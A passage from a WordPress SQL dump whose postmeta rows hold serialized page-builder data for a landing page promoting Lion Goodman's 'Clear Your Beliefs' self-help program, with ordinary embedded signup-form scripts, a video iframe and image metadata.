src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPHONE APP[/su_button]\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPAD APP[/su_button]\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:759:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png"></div>\n<p style="text-align: center; margin-top: 37px; font-size: 18px;"> <big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<p style="text-align: center; margin-top: 37px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence</center>\n<script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1418:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h1>The <em>Clear Your Beliefs</em> Program empowers you to...</h1>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:2842:"<div id="divStroke"><p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman<br /></strong><strong>Creator of the <em>Clear Your Beliefs</em> program. </strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul><li> <em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback.  I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1174, 1657, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:225:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:435:"<center style="margin-top: -108px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:728:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;"><div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:689:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPHONE APP[/su_button]\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPAD APP[/su_button]\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:835:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png"></div><p style="text-align: center; margin-top: 17px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p><p style="text-align: center; margin-top: 17px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence</center>\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1418:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h1>The <em>Clear Your Beliefs</em> Program empowers you to...</h1>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:2842:"<div id="divStroke"><p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman<br /></strong><strong>Creator of the <em>Clear Your Beliefs</em> program. </strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul><li> <em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback.  I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1175, 1658, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:225:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:435:"<center style="margin-top: -108px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:728:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;"><div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:689:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPHONE APP[/su_button]\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPAD APP[/su_button]\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:836:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png"></div>\n<p style="text-align: center; margin-top: 15px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<p style="text-align: center; margin-top: 15px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, &\nLimit Your True Magnificence</center>\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1418:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h1>The <em>Clear Your Beliefs</em> Program empowers you to...</h1>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:2842:"<div id="divStroke"><p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman<br /></strong><strong>Creator of the <em>Clear Your Beliefs</em> program. </strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul><li> <em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback.  I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1176, 1659, '_wp_attached_file', '2014/10/iClear-new-FINAL-large-with-font.jpg'),
(1177, 1659, '_wp_attachment_metadata', 'a:4:{s:5:"width";i:1884;s:6:"height";i:2136;s:4:"file";s:44:"2014/10/iClear-new-FINAL-large-with-font.jpg";s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:16:"iCreate new copy";}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
